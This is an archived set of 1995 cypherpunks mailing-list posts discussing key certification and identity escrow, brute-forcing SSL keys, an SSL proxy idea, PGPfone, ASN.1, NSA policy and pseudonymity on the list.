> in the time two single keys could be tested against one message.

Well, the original suggestion I heard was to try 64K at a time :-))




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 3 Sep 95 08:38:02 PDT
To: cypherpunks@toad.com
Subject: hks cypherpunks newsserver down
Message-ID: <v02120d12ac6f8aa91f93@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


nntp.hks.net's cypyherpunks mail -> news gateway has not shown new messages
for more than a week. Strangely, only the cp list seems to be affected.
Anyone know what's up?


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Sun, 3 Sep 95 05:53:33 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits and a Hello
Message-ID: <199509031253.IAA23207@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

Bill Stewart <stewarts@ix.netcom.com> writes:
>At 08:41 PM 8/29/95 -0400, [ I, Dave Conrad ] wrote:
>>One benefit to law enforcement, quite apart from the ability to verify a
>>license, would be the accumulation of a database of thumbprints of all
>>citizens, or at least all those who drive.
>
>They can get that by just collecting it when you get the license (which CA
>does), without having to cram it onto the back of the license.

Obviously, but I think many people would resist it if they collect it just
for the sake of collecting it.  But if they say they are collecting it to
put on the license in order to verify licenses "in the field", then the
collection will be a lot more palatable to a lot more people.

Have people in CA complained much that they collect it when you get the
license?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEmhsxEcrOJethBVAQHFqQP9HvbaGMe4pQhlH1EsS9MKuC1L2+DlnXLb
lhkzJ9OJHRBJ7lN437I2W04ec0YRZXv3vf3Y3CMlYD1w09Ih54ugZYWzQbG7meu/
SHikLH0KVz86RlCUi5qzCrX3Zs+sFXTvkTSJ5t7G7o24/wpxxB2hy+4NBedTPp3o
yYWrn+p0sRU=
=mzOJ
-----END PGP SIGNATURE-----

--
David R. Conrad, ab411@detroit.freenet.org, http://www.grfn.org/~conrad
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
Jerry Garcia, August 1, 1942 - August 9, 1995.  Requiescat in pace.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bigdaddy@ccnet.com
Date: Sun, 3 Sep 95 10:09:37 PDT
To: Cybie@cris.com
Subject: Re: Direct Socket to Remailer?
In-Reply-To: <9509030907.AA04231@mariner.cris.com>
Message-ID: <Pine.SUN.3.91.950903090122.13715B-100000@ccnet3>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Sep 1995 Cybie@cris.com wrote:

> Before you do it, make sure your ISP doesn't mind you telneting to port 25.
> VCU's computer dept. doesn't take to kindly to it.  They're worried about 
> people sending forged e-mail.  (I was tempted to tell the guy when I got 
> caught doing it that they should put a copy of PGP online for folks to use.
> But I just wanted my account re-instated.)

	CMU's systems, for instance, are nice enough to explicitly warn 
you 'Mis-identifying the sender is an abuse of computing resources.' on 
their machines' port 25. I take this to imply that they don't take kindly 
to such use of their machines by students or non-students...but 
what they would do to a non-CMU student is not clear. Come to think of 
it, would there be legal issues involved in forging e-mail addresses? Can 
one have a reasonable expectation of identity in ordinary e-mail? 
Probably not. How about mail authenticated with PGP, RIPEM, Notes, or 
a similar system?

We've seen key certification by VeriSign, among others...and, if we assume a 
certification structure which requires checking the True Name of the 
person, then we have a link between the key and the identity. All well 
and good.

If we add key escrow to this certification structure, or require a True 
Name for *all* keys, then one could have 
'identity escrow'...a situation in which pseudonymous keys can be 
created and distributed with certification that they really belong to a 
(presumably unique) True Name. In the example of a bank with anonymous 
officers, their identities might be held by another 
organization(oversight committee, industry certification authority, 
etc.), and revealed in the event of an investigation. 

Doesn't VeriSign already sign 'Personality Certificates'(sorry if not the 
right term) for pseudonymous IDs? 

Obviously, setting and enforcing limits on keys per person, should that 
be desirable, could be difficult. In the simplest case of one verified 
key and identity per person, an entity who can satisfy the verification 
process multiple times can be issued multiple keys. If there are a number 
of independent Certification Authorities, and assuming they don't 
cross-check, one could get as many keys as there are CAs. Lag time 
between, say, the Dhahran, Saudi Arabia office of the CA and the rest of 
the structure might also allow for two or more keys at once.

There's probably a dozen different ways to fool a CA or group of CAs. 
Unfortunately, they're likely to be so difficult, and the penalties 
severe enough(e.g. permanent revocation of all keys with a particular 
CA), that few will use them. 

I wonder if this sort of "feature" is already on tap for a Government 
Certification Authority in the U.S.. If pseudonymity is offered at 
all(perhaps as a 
sort of compromise), it seems reasonable that any State-sponsored CA 
would insist on identity escrow. The next logical step, of course, would 
be to subordinate, discredit, or outlaw other CAs, in order to minimize 
the 'possibility' of 'evil criminals' using the 'national information 
infrastructure' for 'nefarious acts of impersonation'.

Web-of-trust would probably still be legal. It would be absurdity to even 
attempt to outlaw it, as one would hope the example of PGP has shown. One 
might as well outlaw gossip. 
Unfortunately, web-of-trust is rarely as extensive(at least for me) than 
a full-blown certification hierarchy. It is certainly more work.

In effect, the State would reserve to itself the ability to certify keys 
on a large scale, on its terms. Scary.

On the other hand, it could also make for some very interesting 
situations...such as a pseudonymous identity, accredited by the State, 
able to participate in elections, enter into binding contracts, and 
telecommute to work. Again, making sure no one registers and votes 
twice might be a bit of work. Perhaps down the line, such 
an identity could run for office. The line 'I'm With Stupid' 
takes on a whole new meaning...

David Molnar

P.S. Andrew L : Yes, I'm the same person you knew in 
Houston! Have you received the mail I sent you? 
-Haynow








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Limpert" <johnl@radix.net>
Date: Sun, 3 Sep 95 07:58:54 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto '95: Robert Morris
Message-ID: <199509031457.KAA21322@saltmine.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:50 AM 9/3/95 +0200, you wrote:
>So Robert Morris worked for NSA.
>Does that mean that the infamous 1988 Internet Worm
>was part of a NSA-sponsored intelligence-gathering mission?

Robert Morris Jr. wrote the worm. His father, Robert Morris Sr.
worked for the NSA.


--
John A. Limpert
johnl@Radix.Net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Magee <Tim@alia1.demon.co.uk>
Date: Sun, 3 Sep 95 15:15:52 PDT
To: cypherpunks@toad.com
Subject: Re: anyone know what this "top secret" code does?
Message-ID: <150@alia1.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


In your message dated Saturday 2, September 1995 :
> Does anyone remember the scenario someone suggested awhile back that
> hypothesized a scheme by the NSA or other TLAs to encourage the use
> of WEAK crypto?  It involved spreading a lot of F.U.D. about PGP and
> other strong crypto methods, followed by the discovery/leak of a
> supposedly "strong" crypto algorithm to replace it.

If the YFTLA could diffuse actual source of a method *supposedly* stronger than 
IDEA and get away with it, could they not equally qell get away with planting 
their man Zimmermann and having him publish PGP with a cunning trapdoor?  Let's 
see, to lend cred to that though they'd probably have to have him arrested on 
trumped-up charges and generally harassed ...

Many people only THINK they know what cynicism means.

Seriously: I've not been round long enough to have a good idea how likely my 
proposed scenario is.  You can all probably tell me things about Z's provenance 
which blow my little theory sky-high.

cheers,
tim M.
-- 
"Man is born free, and everywhere he is very reasonable." -- Rousseau (roughly)
Tim Magee, e-mail: Tim@alia1.demon.co.uk, tel: +44-1225-316785





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Sun, 3 Sep 95 02:50:21 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto '95: Robert Morris
Message-ID: <199509030950.LAA15691@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


So Robert Morris worked for NSA.
Does that mean that the infamous 1988 Internet Worm
was part of a NSA-sponsored intelligence-gathering mission?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Sun, 3 Sep 95 03:04:39 PDT
To: cypherpunks@toad.com
Subject: Re: sums with BIG numbers
Message-ID: <v01510102ac6e97a01432@[193.74.217.9]>
MIME-Version: 1.0
Content-Type: text/plain


Deranged Mutant wrote:

>>
>What do you mean? How big numbers are added (trivially easier than
>multiplication
>or division) or how it handles numbers that are too large for the variable's
>size?

and Ray Cromwell wrote :

To add two bignums, P(x) and Q(x) simply sum coefficients of like
terms like you would with any polynomial addition, with one simple
modification. If a_k is the coefficient of the x^k term of P(x), and

etc, etc.


Just a quick clarification, people:

In the UK, and, presumably Australia, "doing sums" refers to performing any
kind of arithmetic, not just addition.


And to Sherry Mayo:

Don't give up on the code, just yet.  Try running it and watching it with a
debugger.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 3 Sep 95 12:49:19 PDT
To: don@cs.byu.edu
Subject: Re:  SSLRef (SSLtelnet)
Message-ID: <199509031948.MAA17974@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


The link I used recently to get SSLREF is <URL:
http://www.netscape.com/eng/ssl/sslref2.0/index.html>.  I don't now what
kind of export restrictions this enforces.

I was hoping to write a program which would sit on the user's PC and act
as a proxy for Netscape's browser.  It would connect using 128 bit SSL
instead of 40 bit.

The stumbling block is that Netscape won't connect to even the local
proxy unless it sees a valid certificate, one signed by a CA that it
accepts.  For this application I would need such a certificate, and make
the corresponding public and private keys public, hard-coding them into
the proxy.  Since the proxy runs on the same PC as the browser there is
no need for confidentiality between them, and the secret key can be
revealed.

Does anyone have an idea for a way to acquire a certificate acceptable to
Netscape, perhaps one with a "broken key", that could be used for this
purpose?

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Johnson@Colorado.EDU (Richard Johnson)
Date: Sun, 3 Sep 95 12:26:51 PDT
To: cypherpunks@toad.com
Subject: Re: Dumb Question: PGPfone over Appletalk
Message-ID: <v02130500ac6fad38bbbe@[199.117.100.2]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Can someone tell me how to run PGPfone over Appletalk ? The
>documentation says that support has been added for this release, and
>there's a preferences box to check to use it, but there's no information
>I can find in the documentation on how to initiate a call over
>Appletalk.. it just says to enter a telephone number to dial. If I
>press 'Connect' without entering anything it hangs up the Mac.
>
>How do I tell it which machine I want to connect to ?
>
>        Mark "Don't know much about Macs" Grant

My guess is that you're on a network with multiple AppleTalk zones.  The
"PGPfone 1.0b4 README" file mentions a known bug that causes PGPfone to
freeze when trying to bring up its AppleTalk Browser.  The Read Me file
then goes on to explain how to connect anyway.  Be sure to use a
semi-colon, not a colon, between the zone name and the macintosh name...


Richard

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEn+T/obez3wRbTBAQHG7gP+J8It6kZTRYhte2ffTSzflQB8ff14a2pR
VR81PD0HIjE5cyNTrAlA6FdVGguy21BIK+tUz5rmQBRuZP46OWynBqk4y551M+fg
JjnEOk2jXNBZDFdwT9fy5hWc3g38os6vto5/4vsj5Vhw0+6EoVojzJ8AU99ibG7z
pKnPhQnpISI=
=8lQJ
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 3 Sep 95 10:59:07 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto '95: Robert Morris
In-Reply-To: <199509030950.LAA15691@utopia.hacktic.nl>
Message-ID: <199509031758.NAA01453@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Name Withheld by Request writes:
> So Robert Morris worked for NSA.
> Does that mean that the infamous 1988 Internet Worm
> was part of a NSA-sponsored intelligence-gathering mission?

You have the junior and senior Robert Morris confused.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Sun, 3 Sep 95 11:16:31 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Mail to mail.cypherpunks "newsgroup" echoes to list
Message-ID: <Pine.PMDF.3.91.950903141403.541101819G-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I have been getting a load of duplicate mail from this group; not all 
messages are duplicated, only those cc'd to mail.cypherpunks as well as 
sent to the toad.com address.

I don't know if this is a gateway to a local newsgroup or what, but I 
wish the duplication would stop.  Thank you.  

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki

---------- Forwarded message ----------
Date: Sun, 03 Sep 1995 08:38:54 -0600 
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
To: lyal collins <lyalc@ozemail.com.au>
Cc: cypherpunks@toad.com, Piete.Brooks@cl.cam.ac.uk
Newgroups: mail.cypherpunks
Subject: Re: A bold ssl idea ? 

> I understand that setting up RC4 keys is slower that testing for the correct
> key (I may have misuderstood this bit).

For pure RC4, Yes.  However, SSL is not pure RC4.

> Is it considered practical to modify the brutessl code to have multiple
> message data, and test each against a key from allocated key space ?

You are the third person I've heard think of this.
[ The first did quite a lot of calculations before spotting the problem ! ]

> If so, this may mean that perhaps 3 message can be tested against a single
> in the time two single keys could be tested against one message.

Well, the original suggestion I heard was to try 64K at a time :-))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian A. LaMacchia <bal@martigny.ai.mit.edu>
Date: Sun, 3 Sep 95 11:36:26 PDT
To: cypherpunks@toad.com
Subject: Looking for NII IP "White Paper"...
Message-ID: <9509031836.AA23248@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


According to an article in Sunday's _Washington Post_ the final draft of
the "Intellectual Property and the National Information Infrastructure"
report is going to be released Tuesday morning.  You may recall the
premilinary draft of this report, a.k.a. the "Green Paper", and its
proposed changes to U.S. Copyright Law.  

Does anyone on the list have a copy of the final draft/"White Paper"?
The administration is evidently keeping it under pretty tight wraps,
probably because of the intense criticism the Green Paper received.
Personally, I expect the White Paper to be just as bad.

					--bal

References:

The Green Paper/Preliminary Draft is available at:

   http://www.uspto.gov/niiip.html

Pam Samuelson's critique, which appeared in _Communications of the ACM_
and which you should definitely read, is available at:

   http://www-swiss.ai.mit.edu/6095/articles/samuelson-nii-cacm-dec94.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pfarrell@isse.gmu.edu (Pat Farrell)
Date: Sun, 3 Sep 95 11:39:09 PDT
To: pfarrell@netcom.com
Subject: WEB pointers for NIS&T Key Escrow meeting
Message-ID: <9509031838.AA01294@isse.gmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


To save list bandwidth, I've put the agenda, attendee list, and
the three discussion topic papers for this week's Key Escrow 
meeting on my web. url: http://www.isse.gmu.edu/~pfarrell/nistmeeting.html

I'll add anything else I get from NIS&T, and any pointers folks
send my way.

Pat

Pat Farrell      grad student        http://www.isse.gmu.edu/students/pfarrell
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request           #include standard.disclaimer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 3 Sep 95 14:35:50 PDT
To: cypherpunks@toad.com
Subject: NIST attendee list
Message-ID: <v02120d18ac6fde2f25f8@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


The dangers of public attendee lists. Some Cypherpunk might match the list
against east cost lawyers and break Black Unicorn's nym.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sun, 3 Sep 95 12:52:12 PDT
To: cypherpunks@toad.com
Subject: Re: ASN.1 and Kerberos version 5
In-Reply-To: <ac6e483800021004fa65@[18.162.1.1]>
Message-ID: <9509031951.AA23373@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



I don't think that the concept of ASN.1 is as bad as Jeff makes out. If it worked 
then ASN.1 would be very very usefull. But is just plain don't.

ASN.1 is worse than useless, it means that a very good idea is rendered unusable 
because of a baddly botched implementation.

The ambiguities of the ASN.1 spec are at least as bad as Jeff makes out. I have 
attempted to implement an ASN.1 compiler but I have little cofidence in its 
correctness because the structure of ASN.1 is so unweildy. It is not just ANY 
that causes problems, IMPLICIT is a complete cock up.


ASN.1 is poor because it is unecessarily complex, has little intelectual 
coherence and has been extended in a manner which conflicts with the original 
design principle. 

Is it any coincidence that ASN.1 backwards is the name of a well known 
organisation? Also the only person who has defended ASN.1 to my face happened to 
work for that organisation once.


So the motto is: ASN.1 - Just say NO!

		Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Sun, 3 Sep 95 13:17:32 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: SSLRef (SSLtelnet)
In-Reply-To: <199509031948.MAA17974@jobe.shell.portal.com>
Message-ID: <199509032018.QAA03382@janet.advsys.com>
MIME-Version: 1.0
Content-Type: text/plain


hfinney@shell.portal.com said:
> Does anyone have an idea for a way to acquire a certificate 
> acceptable to Netscape, perhaps one with a "broken key", that could 
> be used for this purpose? 

RSA will give out certificates to individuals; Apple includes a coupon for a 
free one with their MacOS 7.5 (and 7 Pro) release.  There's a program for the 
Mac (RIPEM Mac) that will convert the keys returned into RIPEM usable 
PEM-format keys.  Isn't that what SSL uses?

The only question is what CAs are supported by the browser....  I think the 
Apple keys are under RSA's Unaffiliated User CA...

If there's interest, I'll look further into this.

Bob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Sun, 3 Sep 95 14:40:59 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: NIST attendee list
In-Reply-To: <v02120d18ac6fde2f25f8@[192.0.2.1]>
Message-ID: <Pine.SUN.3.91.950903174027.8153A-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Sep 1995, Lucky Green wrote:

> Date: Sun, 3 Sep 1995 14:39:38 -0800
> From: Lucky Green <shamrock@netcom.com>
> To: cypherpunks@toad.com
> Subject: NIST attendee list
> 
> The dangers of public attendee lists. Some Cypherpunk might match the list
> against east cost lawyers and break Black Unicorn's nym.
> 

Luckily I've accounted for this.


> 
> -- Lucky Green <mailto:shamrock@netcom.com>
>    PGP encrypted mail preferred.
> 
> 
> 

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 3 Sep 95 17:55:13 PDT
To: jim@acm.org
Subject: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509030434.VAA24841@mycroft.rand.org>
Message-ID: <199509040052.RAA25910@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



jim@acm.org:

>- By the middle to late 1960's cryptanalysis became less cost effective
>  than obtaining the information by other means -- wiretaps and so on.

but for some reason, the NSA keeps humming along...? perhaps 
confirming the rule that bureacracies, like bores at parties,
persist long after they are relevant?

>In the future there will be more radio used for ordinary communications.
>Americans are unwilling to pay for secure telephones, but that's not the
>case in Europe.

I object to this highly. the NSA has very little credible understanding
of market forces, IMHO. they are a government agency. they do not
understand marketing or human psychology. Clipper, the closest the
agency has come to creeping out of the darkness of their coffin,
was a total fiasco. the self-destructing director of NSA whats-his-name
who as running for that FBI position or whatever is another example of how 
the inbred spook society has difficulty dealing with anything outside
their artificial reality.

as for the market viability of cryptographic phones, I think this
is duplicity ranging on utter lying that "the US public is not 
willing to pay for secure phones". this is precisely the baseless
rumor and conventional wisdom one would expect the NSA attempt to
spread and use to surreptitiously manipulate the natural market direction.
every phone company would avoid even introducing a phone model
because "after all the public is not willing to pay for encryption".
sure, maybe they won't pay for the very finest encryption money
can buy, but they can get some pretty awesome bang for minor bucks
when it comes to crypto.

the fact is, cryptography is becoming EXTREMELY CHEAP. virtually
all phones are going to have some high power microprocessor inside
that could be used to do semi-decent secure encryption, far better
than *nothing*, the current status quo-- *for free*, virtually, because
the phone is already going to have some serious horsepower. the whole
issue of "signal transformation" is very intrinsic to the existing
phone circuitry anyway.

extremely secure encryption (i.e. that the NSA is not likely to
break at all) is another issue, but again chips are becoming
awfully cheap.

so I say anyone spreading a rumor that "american public doesn't
want encryption or is not willing to pay for it" (esp. in 
cell phones or whatever) is either:

1. intentionally lying
2. rather clueless
3. making an unwarranted and undemonstrated assumption
4. possibly has an axe to grind-- i.e. axeing widespread public
encryption

furthermore, the idea that someone from NSA would say something
like "the U.S. public doesn't want so-and-so" encryption I find
highly repulsive. the NSA's business is based on SUPPRESSING ENCRYPTION.
it would be hard to find a more biased and less credible opinion
anywhere. the NSA has done the very best job of sabotaging the 
natural growth of cyberspace by having its slithering tentacles
lodged into key areas of influence within our government, while
at the same time pretending that  it is actually working in our
own best interest.

--

frankly, I think any anti-encryption sentiment is inherently
unpatriotic. you see, there is far more to be gained from widespread
encryption than is to be lost from it. the NSA in their anal
retentive, freedom-pissing mode will never understand this, or
never apprise the situation unbiasedly, but it appears to me
to be fairly unequivocal that there are tremendous benefits
from the availability of widespread, seamless, invisible 
encryption.

if the NSA released one public report that analyzed the actual
cost benefit ratio to *society* of free encryption, that is the
day I will scrape a smidgeon of respect for this vile, odious,
noxious excuse for a publicly funded institution. but the NSA
will never do this, because 

(1) the NSA can barely stand to address the congress honestly
and openly, and virtually never does even this, and so the
idea of justifying its existence to the actual public that
pays for its spook toys is beyond distasteful to the agency,
it would be sacrilegious!!

(2) they are incapable of an 
unbiased opinion on the issue, in fact they are probably not
even capable of any opinion that is not duplicitous and inherently
self-serving beneath a surface sugar-coating of actual legitimacy, 

(3) they don't want to admit that
their main motive, their raison d'etre, has absolutely nothing to 
do with maximizing overall public welfare-- it has to do with maximizing 
their own budget and maximizing intelligence available to their
omnipresent tentacles.

but thanks, JG, for a look into the dark, squirmy, teeming recesses of 
some perverted spook's mind. I would thoroughly enjoy any other choice
morsels you have to offer about the lies that spooks tell each other to
justify their existence. and the ones that they actually believe are by
far the most entertaining! <g>

--Vlad Nuri





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 3 Sep 95 18:33:54 PDT
To: cypherpunks@toad.com
Subject: pseudonyms & list health
Message-ID: <199509040131.SAA29509@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


P.M. remarked in exasperation a little while ago that
he thought that some of the best minds had been lost in list
attrition due to high traffic, naming some people who had
seemingly dropped from the list (Bill Stewart? Phil Karn?)

but what if these people had just stopped subscribing under
their clear name? and started using a pseudonym?

this brings to light the idea that credibility is hard won,
and that it is hard to get, and that people need all the
credibility that they can achieve. it seems that virtually
all accomplishments are credibility-enhancing, and people
only "notch down" their reputation estimations in extreme
circumstances. 

hence, what I am suggesting is that one
of the "stable attractors"  that TM is always talking about
may be a reality in which people pool most of their accomplishments
under a single nym. furthermore, they will wish to avoid conflict
with other nyms in respect to attribution. 
isn't this, functionally, the equivalent of the supposed
anti-cypherpunk "true names"?

now, I'm not suggesting that "if you want to do something in
secret, you must have something to hide". (although that seems
almost like a tautology to me). but what I am suggesting, is
that if you want to get credit, it may pay to pool all your
accomplishments under one nym (tracing it to a physical body
is a whole separate issue-- the two should not be confused;
although the concept of "true names" does tend to blur this
distinction).

in the case of PM, he thought that because some people ostensibly
dropped from the list, the list quality had decreased. but
he seemed to be making this conclusion based on their "real
identity". what if they were still around, posting under
pseudonyms? would he be able to tell? would the signal quality
be the same?

the point is that people seem to judge list quality based on
criteria in which "true names" play a major role. I'm not saying
this is the only way to do it, but I am saying that "true names"
seem to be very much ingrained into human psychology, particularly
in public forums and attributing credit, and the idea that they are 
wholly irrelevant to most human endeavor
is very suspicious, at least deserving more than a few paragraphs
of supposed proof.

--

another problem with pseudonyms and list noise is the following.
first, let me start by saying I think this list approaches the
"dysfunctional" level at times when everyone is ranting about each
other about staying on topic. there is an awful lot of hostility
on this list. maybe people like it, I'm not sure. I'm interested
in the sources of this hostility, though, and I think I can identify
some good candidates.

the list hostility and tension is quite palpable. when TM prefaces
many of his posts, and many others do, with frequent apologies about
being on topic, I am amazed to see this because I don't see people
so self-conscious on other mailing lists. 

in my opinion, this is where the role of the moderator is absolutely
critical. any mailing list with an AWOL moderator is only asking
for total chaos, IMHO. in this case I'll use the word "moderator"
and "list creator" interchangeably.

the best recommendation to everyone who subscribes to the list,
and to the moderator, is that THE MODERATOR DETERMINES WHAT IS RELEVANT.

that means that no one else has the authority to do this, NO ONE. if 
you find a post that bothers you, FIRST WRITE THE LIST MODERATOR.
ask the LIST MODERATOR to deal with the offending poster.

the list moderator should make a judgement when the list is in a 
"noise" phase and try to be clear about what is relevant to the
list and what is not. what this requires is a watchful eye and
regular interventions, IMHO.

a list where the moderator is never around may seem like a haven,
but in my opinion it only turns into a grouch free-for-all subject
to regular conflagrations that leave everyone *really* pissed off,
as did a recent eruption by TM and PM.

now, whenever you see someone write, THIS ISN'T RELEVANT TO THIS LIST!!
THIS DOESN'T HAVE ANYTHING TO DO WITH CRYPTO!! IMHO you should gently
remind this person in email that THEIR OPINION OF WHAT IS RELEVANT OR NOT IS
NOT RELEVANT. tell them to write the list moderator first, IN EMAIL. jamming
up the communication medium with meta traffic about what is an is
not relevant is absolutely futile and useless and counterproductive
and extremely anxiety producing.

so, as you can see, IMHO people who are continually making judgements
about what is or is not relevant to the list, and posting those 
opinions, are PART OF THE PROBLEM.  (I am reminded of one himself talking 
about people who are part of the problem and who is part of the solution. 
well, IMHO, ironically, he is PART OF THE PROBLEM, and for a very obvious 
and clear reason that even an intelligent child could grasp).

--

the Yin to the Yang of all this, however, is that the LIST MODERATOR
MUST OCCASIONALLY SHOW HIS FACE and make unambiguous rulings about
what is and what is not appropriate, especially when the noise level
increases and people start to wonder.

the problem with this is a list moderator who likes to use one or
two pseudonyms. the pseudonyms may be so secret that not *anyone*
on the list is aware of his identity, even close friends. this 
list moderator may be loathe to ever post under his "true name"
or whatever name he used to start the list. 

anyway, you can see that this whole business of pseudonyms, while
perhaps workable, is certainly fraught with pitfalls IMHO. at least
in situations of *public forums*, I am going to go out on a limb
and say that it is very troublesome.

it seems that in any forum, there are people who will try to disrupt
the proceedings so to speak. in real life you can throw them out,
by identifying their *picture*.

in a cyberspace that lacks true identities, you cannot throw out
these "problem people". they continually come back to haunt you
despite your best attempts to bar them. doesn't that bug you?
doesn't that irritate you? doesn't that drive you crazy? or do you
like the idea that the person you most hate in life might be posting
behind any of the next few messages? and there's nothing you can
do about it? because you in fact embrace the capabilities that let
him do this, and you're pretty sure you're not a hypocrite?

well, just some musings for those who unabashadly promote pseudonyms
to contemplate.

p.s. in regard to the above, about "people other than the moderator
posting judgements about what is and is not relevant to the list",
I am not making a judgement about what is and is not relevant
on the list. I am making a judgement about making a judgement
about what is and what is not relevant on the list. <g>

--Vlad Nuri




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Sun, 3 Sep 95 15:41:09 PDT
To: cypherpunks@toad.com
Subject: LR/SHS src (386 ASM)
Message-ID: <199509032235.SAA03213@csws5.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



I have uploaded a copy of lrsha14.zip to the cypherpunks ftp site.

It contains source code for a 32-bit implementation of the Secure Hash
Algorithm as well as a Luby-Rackoff/SHA cipher in CFB mode, and a sample
Turbo Pascal interface for debugging it, etc.

-Rob



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sun, 3 Sep 95 18:40:08 PDT
To: cypherpunks@toad.com
Subject: Re: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509040052.RAA25910@netcom10.netcom.com>
Message-ID: <199509040139.SAA26859@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> jim@acm.org (reporting on R. H. Morris' talk at Crypto '95):

> >- By the middle to late 1960's cryptanalysis became less cost effective
> >  than obtaining the information by other means -- wiretaps and so on.

> "Vladimir Z. Nuri" <vznuri@netcom.com> writes:
> but for some reason, the NSA keeps humming along...? perhaps 
> confirming the rule that bureacracies, like bores at parties,
> persist long after they are relevant?

Evidently they have plenty of other sources to deal with... their SIGINT
charter is to read traffic, not necessarily to decrypt traffic.  It does
seem excessive, though, and it will seem even more excessive once more
traffic is encrypted with strong systems and plaintext begins to disappear
from the airwaves and wires.  It bothers me that the gov't appears to
be redefining the role of the intelligence community to be economic spying
rather than the military spying that was (I think) justified during the
Cold War.  Rather than finding ways to justify and maintain current budgets
and bureaucracies, why not just cough up the peace dividend?

> >In the future there will be more radio used for ordinary communications.
> >Americans are unwilling to pay for secure telephones, but that's not the
> >case in Europe.

> I object to this highly. the NSA has very little credible understanding
> of market forces, IMHO. they are a government agency. they do not
...
> as for the market viability of cryptographic phones, I think this
> is duplicity ranging on utter lying that "the US public is not 
> willing to pay for secure phones". this is precisely the baseless

I misstated his point to some extent here.  He was contrasting current
buying practices in the U.S. and in Europe, not predicting the future (i.e.
